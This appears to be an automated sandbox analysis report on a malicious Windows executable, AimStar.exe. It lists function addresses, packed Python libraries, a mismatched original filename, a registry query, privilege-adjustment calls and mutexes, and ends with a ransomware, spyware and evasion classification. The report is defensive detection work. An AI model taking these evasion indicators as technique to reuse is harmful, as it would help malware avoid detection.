Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8802C60	2_2_00007FF8A8802C60
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8760DD0	2_2_00007FF8A8760DD0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87E8D00	2_2_00007FF8A87E8D00
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8769D10	2_2_00007FF8A8769D10
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87DAD20	2_2_00007FF8A87DAD20
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A875BD40	2_2_00007FF8A875BD40
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87ABD50	2_2_00007FF8A87ABD50
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A877DE40	2_2_00007FF8A877DE40
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8794F00	2_2_00007FF8A8794F00
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87ECF20	2_2_00007FF8A87ECF20
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87780B0	2_2_00007FF8A87780B0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87770D0	2_2_00007FF8A87770D0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8805030	2_2_00007FF8A8805030
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87DC040	2_2_00007FF8A87DC040
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87531A5	2_2_00007FF8A87531A5
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87621F0	2_2_00007FF8A87621F0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8754120	2_2_00007FF8A8754120
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A876D2B0	2_2_00007FF8A876D2B0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87DA380	2_2_00007FF8A87DA380
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A876C380	2_2_00007FF8A876C380
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A877F380	2_2_00007FF8A877F380
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A877D3A0	2_2_00007FF8A877D3A0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87B73E0	2_2_00007FF8A87B73E0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8814320	2_2_00007FF8A8814320
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8757336	2_2_00007FF8A8757336
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A879F360	2_2_00007FF8A879F360
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87594E0	2_2_00007FF8A87594E0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87C4430	2_2_00007FF8A87C4430
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A879A5A0	2_2_00007FF8A879A5A0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87F5510	2_2_00007FF8A87F5510
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8754570	2_2_00007FF8A8754570
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8774630	2_2_00007FF8A8774630
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8781630	2_2_00007FF8A8781630
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87AB640	2_2_00007FF8A87AB640
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A877E650	2_2_00007FF8A877E650
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8763660	2_2_00007FF8A8763660
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87C77D0	2_2_00007FF8A87C77D0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A9315C00	2_2_00007FF8A9315C00
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A92D1618	2_2_00007FF8A92D1618
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A92D1EE2	2_2_00007FF8A92D1EE2
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A9308920	2_2_00007FF8A9308920
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A934AC80	2_2_00007FF8A934AC80
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A92D1A0F	2_2_00007FF8A92D1A0F
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A92D2617	2_2_00007FF8A92D2617
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8476B3027	12_2_00007FF8476B3027
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 57_2_00007FF8475D3EA5	57_2_00007FF8475D3EA5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 57_2_00007FF8475D20FD	57_2_00007FF8475D20FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 57_2_00007FF8476A17D9	57_2_00007FF8476A17D9
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139654C0	88_2_00007FF7139654C0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139582F0	88_2_00007FF7139582F0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713961180	88_2_00007FF713961180
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713951884	88_2_00007FF713951884
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71395B540	88_2_00007FF71395B540
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71395ABA0	88_2_00007FF71395ABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713987B24	88_2_00007FF713987B24
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713960A2C	88_2_00007FF713960A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71397AE10	88_2_00007FF71397AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71395A504	88_2_00007FF71395A504
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71397D458	88_2_00007FF71397D458
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713995468	88_2_00007FF713995468
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71397C3E0	88_2_00007FF71397C3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139A832C	88_2_00007FF7139A832C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713962360	88_2_00007FF713962360
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713980374	88_2_00007FF713980374
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71396D2C0	88_2_00007FF71396D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139902A4	88_2_00007FF7139902A4
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139A1314	88_2_00007FF7139A1314
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139542E0	88_2_00007FF7139542E0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713977244	88_2_00007FF713977244
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71395F24C	88_2_00007FF71395F24C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71396E21C	88_2_00007FF71396E21C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139A2268	88_2_00007FF7139A2268
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139981CC	88_2_00007FF7139981CC
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139B41CC	88_2_00007FF7139B41CC
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713992164	88_2_00007FF713992164
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139A18A8	88_2_00007FF7139A18A8
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713980904	88_2_00007FF713980904
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71399190C	88_2_00007FF71399190C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139838E8	88_2_00007FF7139838E8
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713958884	88_2_00007FF713958884
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713962890	88_2_00007FF713962890
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139617C8	88_2_00007FF7139617C8
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139767E0	88_2_00007FF7139767E0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139686C4	88_2_00007FF7139686C4
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139B86D4	88_2_00007FF7139B86D4
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713992700	88_2_00007FF713992700
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71398A710	88_2_00007FF71398A710
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713990710	88_2_00007FF713990710
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139A7660	88_2_00007FF7139A7660
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713968598	88_2_00007FF713968598
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71398F59C	88_2_00007FF71398F59C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71397F5B0	88_2_00007FF71397F5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139865FC	88_2_00007FF7139865FC
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139A260C	88_2_00007FF7139A260C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71395DD04	88_2_00007FF71395DD04
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713979D0C	88_2_00007FF713979D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139A6D0C	88_2_00007FF7139A6D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713968C30	88_2_00007FF713968C30
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713995C8C	88_2_00007FF713995C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139A9B98	88_2_00007FF7139A9B98
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713994B38	88_2_00007FF713994B38
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139BAAC0	88_2_00007FF7139BAAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71395CB14	88_2_00007FF71395CB14
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713995A70	88_2_00007FF713995A70
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71398FA6C	88_2_00007FF71398FA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139549B8	88_2_00007FF7139549B8
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139969FD	88_2_00007FF7139969FD
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71398D91C	88_2_00007FF71398D91C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71397D97C	88_2_00007FF71397D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713970104	88_2_00007FF713970104
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139B00F0	88_2_00007FF7139B00F0
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713988040	88_2_00007FF713988040
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713963030	88_2_00007FF713963030
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71397C05C	88_2_00007FF71397C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713980074	88_2_00007FF713980074
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71398C00C	88_2_00007FF71398C00C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139BDFD8	88_2_00007FF7139BDFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713994FE8	88_2_00007FF713994FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713985F4C	88_2_00007FF713985F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139BAF90	88_2_00007FF7139BAF90
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71399EEA4	88_2_00007FF71399EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713959EFC	88_2_00007FF713959EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71398AF0C	88_2_00007FF71398AF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71399AE50	88_2_00007FF71399AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71395CE84	88_2_00007FF71395CE84
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139AFE74	88_2_00007FF7139AFE74
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713968E68	88_2_00007FF713968E68
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139A1DCC	88_2_00007FF7139A1DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713961E04	88_2_00007FF713961E04
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71395EE08	88_2_00007FF71395EE08
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713980D20	88_2_00007FF713980D20
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF713999D74	88_2_00007FF713999D74

Source: C:\Users\user\Desktop\AimStar.exe	Code function: String function: 00007FF8A8759350 appears 126 times
Source: C:\Users\user\Desktop\AimStar.exe	Code function: String function: 00007FF8A934D32F appears 37 times
Source: C:\Users\user\Desktop\AimStar.exe	Code function: String function: 00007FF8A875A510 appears 155 times
Source: C:\Users\user\Desktop\AimStar.exe	Code function: String function: 00007FF710F42710 appears 104 times
Source: C:\Users\user\Desktop\AimStar.exe	Code function: String function: 00007FF8A92D1325 appears 68 times
Source: C:\Users\user\Desktop\AimStar.exe	Code function: String function: 00007FF710F42910 appears 34 times
Source: C:\Users\user\Desktop\AimStar.exe	Code function: String function: 00007FF8A934D341 appears 191 times
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: String function: 00007FF7139949F4 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: String function: 00007FF713968444 appears 48 times

Source: AimStar.exe

Static PE information: invalid certificate

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: AimStar.exe	Binary or memory string: OriginalFilename vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2018659572.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2018959049.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000000.2017931860.00007FF710F84000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameISOBURN.EXEj% vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2018501635.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2019145684.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2022068584.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2018741735.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2018305938.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2022324030.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2022622103.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2018393901.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2019051678.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs AimStar.exe
Source: AimStar.exe, 00000000.00000003.2018862526.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs AimStar.exe
Source: AimStar.exe	Binary or memory string: OriginalFilename vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2423868259.00007FF8B93D8000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2424380802.00007FF8B9F6C000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2422923145.00007FF8B8B14000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2423234762.00007FF8B8B4A000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2423603752.00007FF8B8F96000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2420980219.00007FF8A8F27000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython313.dll. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameISOBURN.EXEj% vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2422610112.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2424121651.00007FF8B984C000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2422253288.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2418850491.00007FF8A871A000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2421894118.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2424947255.00007FF8BFACA000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs AimStar.exe
Source: AimStar.exe, 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs AimStar.exe
Source: AimStar.exe	Binary or memory string: OriginalFilenameISOBURN.EXEj% vs AimStar.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\Desktop\AimStar.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\AimStar.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
Source: python313.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9994215874784359
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9980279432552503
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9925709355828221

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@172/63@4/2

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

Code function: 88_2_00007FF71396CAFC GetLastError,FormatMessageW,

88_2_00007FF71396CAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71399B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		88_2_00007FF71399B57C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF71396EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		88_2_00007FF71396EF50

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

Code function: 88_2_00007FF713973144 GetDiskFreeSpaceExW,

88_2_00007FF713973144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\SIHClient.exe	Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Users\user\Desktop\AimStar.exe	Mutant created: \Sessions\1\BaseNamedObjects\L
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
